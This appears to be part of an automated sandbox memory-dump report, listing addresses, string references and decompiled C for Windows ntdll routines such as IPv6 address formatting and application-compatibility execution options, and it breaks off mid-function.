                                                                                                                                                                                                          0x00941ba2
                                                                                                                                                                                                          0x008f898c
                                                                                                                                                                                                          0x008f8992
                                                                                                                                                                                                          0x008f8999
                                                                                                                                                                                                          0x008f89ad
                                                                                                                                                                                                          0x00941ba8
                                                                                                                                                                                                          0x00941ba8
                                                                                                                                                                                                          0x008f89ad
                                                                                                                                                                                                          0x008f89b6
                                                                                                                                                                                                          0x008f89c8
                                                                                                                                                                                                          0x008f89cd
                                                                                                                                                                                                          0x008f89d0
                                                                                                                                                                                                          0x008f89d0
                                                                                                                                                                                                          0x008f89d6
                                                                                                                                                                                                          0x008f89e8
                                                                                                                                                                                                          0x008f89e8
                                                                                                                                                                                                          0x008f89ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f89ed
                                                                                                                                                                                                          0x008f895a
                                                                                                                                                                                                          0x008f883e
                                                                                                                                                                                                          0x008f8841
                                                                                                                                                                                                          0x008f8844
                                                                                                                                                                                                          0x008f8845
                                                                                                                                                                                                          0x008f8848
                                                                                                                                                                                                          0x008f884d
                                                                                                                                                                                                          0x008f8852
                                                                                                                                                                                                          0x008f8b49
                                                                                                                                                                                                          0x008f8858
                                                                                                                                                                                                          0x008f886c
                                                                                                                                                                                                          0x008f886c
                                                                                                                                                                                                          0x008f8872
                                                                                                                                                                                                          0x00941b0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8878
                                                                                                                                                                                                          0x008f8881
                                                                                                                                                                                                          0x008f888b
                                                                                                                                                                                                          0x008f888e
                                                                                                                                                                                                          0x008f8891
                                                                                                                                                                                                          0x008f8896
                                                                                                                                                                                                          0x008f8899
                                                                                                                                                                                                          0x008f8899
                                                                                                                                                                                                          0x008f889e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00941b21
                                                                                                                                                                                                          0x00941b27
                                                                                                                                                                                                          0x00941b2e
                                                                                                                                                                                                          0x00941b42
                                                                                                                                                                                                          0x00941b44
                                                                                                                                                                                                          0x00941b44
                                                                                                                                                                                                          0x00941b4c
                                                                                                                                                                                                          0x00941b4f
                                                                                                                                                                                                          0x00941b55
                                                                                                                                                                                                          0x00941b55
                                                                                                                                                                                                          0x008f88a4
                                                                                                                                                                                                          0x008f88aa
                                                                                                                                                                                                          0x008f88b1
                                                                                                                                                                                                          0x008f88c5
                                                                                                                                                                                                          0x00941b5b
                                                                                                                                                                                                          0x00941b5b
                                                                                                                                                                                                          0x008f88c5
                                                                                                                                                                                                          0x008f88ce
                                                                                                                                                                                                          0x008f88e0
                                                                                                                                                                                                          0x008f88e5
                                                                                                                                                                                                          0x008f88e8
                                                                                                                                                                                                          0x008f88e8
                                                                                                                                                                                                          0x008f88ee
                                                                                                                                                                                                          0x008f8900
                                                                                                                                                                                                          0x008f8900
                                                                                                                                                                                                          0x008f8905
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8905

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • WindowsExcludedProcs, xrefs: 008F87C1
                                                                                                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 008F8827
                                                                                                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 008F8914
                                                                                                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 008F87E6
                                                                                                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 008F89FC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcspbrk
                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                          • API String ID: 402402107-258546922
                                                                                                                                                                                                          • Opcode ID: acbb8161ad49328a9377f48e456bbf15f84dc76b4881b836b64630b19f89b1de
                                                                                                                                                                                                          • Instruction ID: f47b570781f02acabaa28c5ef49b2998d32585ae6f332fb3c69698850157f5bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: acbb8161ad49328a9377f48e456bbf15f84dc76b4881b836b64630b19f89b1de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F1B5B2D0024DEFCF11EFA9C981DAEBBB8FB08304F14456AE605E7211EB359A45DB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                          			E009113CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                          				intOrPtr* _v16;
                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                          				char _t90;
                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                          				intOrPtr _t108;
                                                                                                                                                                                                          				signed int _t114;
                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                          				intOrPtr _t128;
                                                                                                                                                                                                          				intOrPtr* _t129;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t129 = _a4;
                                                                                                                                                                                                          				_t128 = _a8;
                                                                                                                                                                                                          				_t116 = 0;
                                                                                                                                                                                                          				_t71 = _t128 + 0x5c;
                                                                                                                                                                                                          				_v8 = 8;
                                                                                                                                                                                                          				_v20 = _t71;
                                                                                                                                                                                                          				if( *_t129 == 0) {
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                                          						if(_t96 != 0) {
                                                                                                                                                                                                          							L38:
                                                                                                                                                                                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          								_t86 = E00907707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                          								L36:
                                                                                                                                                                                                          								return _t128 + _t86 * 2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                                          						if(_t114 == 0) {
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							_t115 = 0x8d2926;
                                                                                                                                                                                                          							L35:
                                                                                                                                                                                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                          							_t86 = E00907707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t114 != 0xffff) {
                                                                                                                                                                                                          							_t116 = 0;
                                                                                                                                                                                                          							goto L38;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t114 != 0) {
                                                                                                                                                                                                          							_t115 = 0x8d9cac;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L33;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					_a8 = _t116;
                                                                                                                                                                                                          					_a4 = _t116;
                                                                                                                                                                                                          					_v12 = _t116;
                                                                                                                                                                                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                                          							_v8 = 6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t90 = _v8;
                                                                                                                                                                                                          					if(_t90 <= _t116) {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                                          							_a8 = _t116;
                                                                                                                                                                                                          							_a4 = _t116;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t91 = 0;
                                                                                                                                                                                                          						if(_v8 <= _t116) {
                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                          							if(_v8 < 8) {
                                                                                                                                                                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                          								_t128 = _t128 + E00907707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							return _t128;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                                          								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                                          									_push(":");
                                                                                                                                                                                                          									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                          									_push(_t128);
                                                                                                                                                                                                          									_t128 = _t128 + E00907707() * 2;
                                                                                                                                                                                                          									_t71 = _v20;
                                                                                                                                                                                                          									_t130 = _t130 + 0xc;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t78 = E00907707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                                          								_t130 = _t130 + 0x10;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(L"::");
                                                                                                                                                                                                          								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                          								_push(_t128);
                                                                                                                                                                                                          								_t78 = E00907707();
                                                                                                                                                                                                          								_t130 = _t130 + 0xc;
                                                                                                                                                                                                          								_t91 = _a8 - 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                          							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                                          							_t71 = _v20;
                                                                                                                                                                                                          							if(_t91 >= _v8) {
                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t116 = 0;
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t108 = 1;
                                                                                                                                                                                                          						_v16 = _t129;
                                                                                                                                                                                                          						_v24 = _t90;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							if( *_v16 == _t116) {
                                                                                                                                                                                                          								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                                                          									_a4 = _v12;
                                                                                                                                                                                                          									_a8 = _t108;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t116 = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v12 = _t108;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_v16 = _v16 + 2;
                                                                                                                                                                                                          							_t108 = _t108 + 1;
                                                                                                                                                                                                          							_t26 =  &_v24;
                                                                                                                                                                                                          							 *_t26 = _v24 - 1;
                                                                                                                                                                                                          						} while ( *_t26 != 0);
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e975
                                                                                                                                                                                                          0x0093e93b
                                                                                                                                                                                                          0x0093e980
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e980
                                                                                                                                                                                                          0x0093e942
                                                                                                                                                                                                          0x0093e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e942
                                                                                                                                                                                                          0x009113f4
                                                                                                                                                                                                          0x009113f4
                                                                                                                                                                                                          0x009113f9
                                                                                                                                                                                                          0x009113fc
                                                                                                                                                                                                          0x009113ff
                                                                                                                                                                                                          0x00911406
                                                                                                                                                                                                          0x0093e9cc
                                                                                                                                                                                                          0x0093e9d2
                                                                                                                                                                                                          0x0093e9d2
                                                                                                                                                                                                          0x0093e9cc
                                                                                                                                                                                                          0x0091140c
                                                                                                                                                                                                          0x00911411
                                                                                                                                                                                                          0x00911431
                                                                                                                                                                                                          0x0091143a
                                                                                                                                                                                                          0x0091143c
                                                                                                                                                                                                          0x0091143f
                                                                                                                                                                                                          0x0091143f
                                                                                                                                                                                                          0x00911442
                                                                                                                                                                                                          0x00911447
                                                                                                                                                                                                          0x009114a8
                                                                                                                                                                                                          0x009114ac
                                                                                                                                                                                                          0x0093e9e2
                                                                                                                                                                                                          0x0093e9e7
                                                                                                                                                                                                          0x0093e9ec
                                                                                                                                                                                                          0x0093ea05
                                                                                                                                                                                                          0x0093ea05
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00911449
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00911449
                                                                                                                                                                                                          0x0091144c
                                                                                                                                                                                                          0x00911459
                                                                                                                                                                                                          0x00911462
                                                                                                                                                                                                          0x00911469
                                                                                                                                                                                                          0x0091146a
                                                                                                                                                                                                          0x00911470
                                                                                                                                                                                                          0x00911473
                                                                                                                                                                                                          0x00911476
                                                                                                                                                                                                          0x00911476
                                                                                                                                                                                                          0x00911490
                                                                                                                                                                                                          0x00911495
                                                                                                                                                                                                          0x0091138e
                                                                                                                                                                                                          0x00911390
                                                                                                                                                                                                          0x00911397
                                                                                                                                                                                                          0x00911398
                                                                                                                                                                                                          0x00911399
                                                                                                                                                                                                          0x009113a1
                                                                                                                                                                                                          0x009113a4
                                                                                                                                                                                                          0x009113a4
                                                                                                                                                                                                          0x00911498
                                                                                                                                                                                                          0x0091149c
                                                                                                                                                                                                          0x0091149f
                                                                                                                                                                                                          0x009114a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009114a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009114a4
                                                                                                                                                                                                          0x00911413
                                                                                                                                                                                                          0x00911415
                                                                                                                                                                                                          0x00911416
                                                                                                                                                                                                          0x00911419
                                                                                                                                                                                                          0x0091141c
                                                                                                                                                                                                          0x00911422
                                                                                                                                                                                                          0x009113b7
                                                                                                                                                                                                          0x009113bc
                                                                                                                                                                                                          0x009113bf
                                                                                                                                                                                                          0x009113bf
                                                                                                                                                                                                          0x009113c2
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911427
                                                                                                                                                                                                          0x0091142b
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0091141c
                                                                                                                                                                                                          0x00911411

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 56a4cff055ee8de93d508e931b3c753281a01f94cf00d0a19cd2695a641d1373
                                                                                                                                                                                                          • Instruction ID: c3c8a4403d4c3e50505fda22e4a57903c9bbbbdc1b405f6172b2c5bee5dbc617
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a4cff055ee8de93d508e931b3c753281a01f94cf00d0a19cd2695a641d1373
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A612D71E04659BACF24DF99C8808FFBBB9EF94700B14C52EE5E547680D334AA80CB60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E00907EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v540;
                                                                                                                                                                                                          				unsigned int _v544;
                                                                                                                                                                                                          				signed int _v548;
                                                                                                                                                                                                          				intOrPtr _v552;
                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				unsigned int _t46;
                                                                                                                                                                                                          				unsigned int _t47;
                                                                                                                                                                                                          				unsigned int _t52;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				unsigned int _t62;
                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 =  *0x9b2088; // 0x7753cceb
                                                                                                                                                                                                          				_v8 = _t33 ^ _t73;
                                                                                                                                                                                                          				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                                          				_t72 = _a4;
                                                                                                                                                                                                          				if(E00907F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                                          					__eflags = _v548;
                                                                                                                                                                                                          					if(_v548 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t62 = _t72 + 0x24;
                                                                                                                                                                                                          					E00923F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                                          					_t71 = 0x214;
                                                                                                                                                                                                          					_v544 = 0x214;
                                                                                                                                                                                                          					E008DDFC0( &_v540, 0, 0x214);
                                                                                                                                                                                                          					_t75 = _t74 + 0x20;
                                                                                                                                                                                                          					_t46 =  *0x9b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                                          					__eflags = _t46;
                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t47 = _v544;
                                                                                                                                                                                                          					__eflags = _t47;
                                                                                                                                                                                                          					if(_t47 == 0) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t47 - 0x214;
                                                                                                                                                                                                          					if(_t47 >= 0x214) {
                                                                                                                                                                                                          						goto L1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(_t62);
                                                                                                                                                                                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                                          					E00923F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                                          					_t52 = E008E0D27( &_v540, L"Execute=1");
                                                                                                                                                                                                          					_t76 = _t75 + 0x1c;
                                                                                                                                                                                                          					_push(_t62);
                                                                                                                                                                                                          					__eflags = _t52;
                                                                                                                                                                                                          					if(_t52 == 0) {
                                                                                                                                                                                                          						E00923F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                                          						_t71 =  &_v540;
                                                                                                                                                                                                          						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                                          						_t77 = _t76 + 0x14;
                                                                                                                                                                                                          						_v552 = _t56;
                                                                                                                                                                                                          						__eflags = _t71 - _t56;
                                                                                                                                                                                                          						if(_t71 >= _t56) {
                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                          							_t62 = E008E8375(_t71, 0x20);
                                                                                                                                                                                                          							_pop(_t69);
                                                                                                                                                                                                          							__eflags = _t62;
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								 *_t62 = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E00923F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                                          							_t77 = _t77 + 0x10;
                                                                                                                                                                                                          							E0094E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                                          							__eflags = _t62;
                                                                                                                                                                                                          							if(_t62 == 0) {
                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                                          							_t71 = _t31;
                                                                                                                                                                                                          							__eflags = _t71 - _v552;
                                                                                                                                                                                                          							if(_t71 >= _v552) {
                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                                          					_push(3);
                                                                                                                                                                                                          					_push(0x55);
                                                                                                                                                                                                          					E00923F92();
                                                                                                                                                                                                          					_t38 = 1;
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					return E008DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                          				_t38 = 0;
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}



























                                                                                                                                                                                                          0x0092e365
                                                                                                                                                                                                          0x0092e368
                                                                                                                                                                                                          0x0092e36e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0092e374
                                                                                                                                                                                                          0x0092e32f
                                                                                                                                                                                                          0x00923f75
                                                                                                                                                                                                          0x00923f7a
                                                                                                                                                                                                          0x00923f7c
                                                                                                                                                                                                          0x00923f7e
                                                                                                                                                                                                          0x00923f86
                                                                                                                                                                                                          0x00907f39
                                                                                                                                                                                                          0x00907f47
                                                                                                                                                                                                          0x00907f47
                                                                                                                                                                                                          0x00907f37
                                                                                                                                                                                                          0x00907f37
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00923F12
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 00923F04
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00923EC4
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0092E345
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00923F75
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00923F4A
                                                                                                                                                                                                          • Execute=1, xrefs: 00923F5E
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0092E2FB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BaseDataModuleQuery
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 3901378454-484625025
                                                                                                                                                                                                          • Opcode ID: 05965bce3ca1e5c4f35e91b747857969d86ba02d8cd0644a7be82e1128812c04
                                                                                                                                                                                                          • Instruction ID: b674a414c082253e516574c1732681bdd2043e3cc387b61f3850f63845bb800c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05965bce3ca1e5c4f35e91b747857969d86ba02d8cd0644a7be82e1128812c04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4041FA71A4021D7ADF20EA94ECC6FDAB3BCFF54710F0005A9B605E61C1EA74AB459F61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00910B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                          				void* _t116;
                                                                                                                                                                                                          				char _t120;
                                                                                                                                                                                                          				short _t121;
                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                          				intOrPtr* _t130;
                                                                                                                                                                                                          				char _t132;
                                                                                                                                                                                                          				short _t133;
                                                                                                                                                                                                          				intOrPtr _t141;
                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                          				signed int _t174;
                                                                                                                                                                                                          				intOrPtr _t177;
                                                                                                                                                                                                          				intOrPtr* _t179;
                                                                                                                                                                                                          				intOrPtr _t180;
                                                                                                                                                                                                          				void* _t183;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t179 = _a4;
                                                                                                                                                                                                          				_t141 =  *_t179;
                                                                                                                                                                                                          				_v16 = 0;
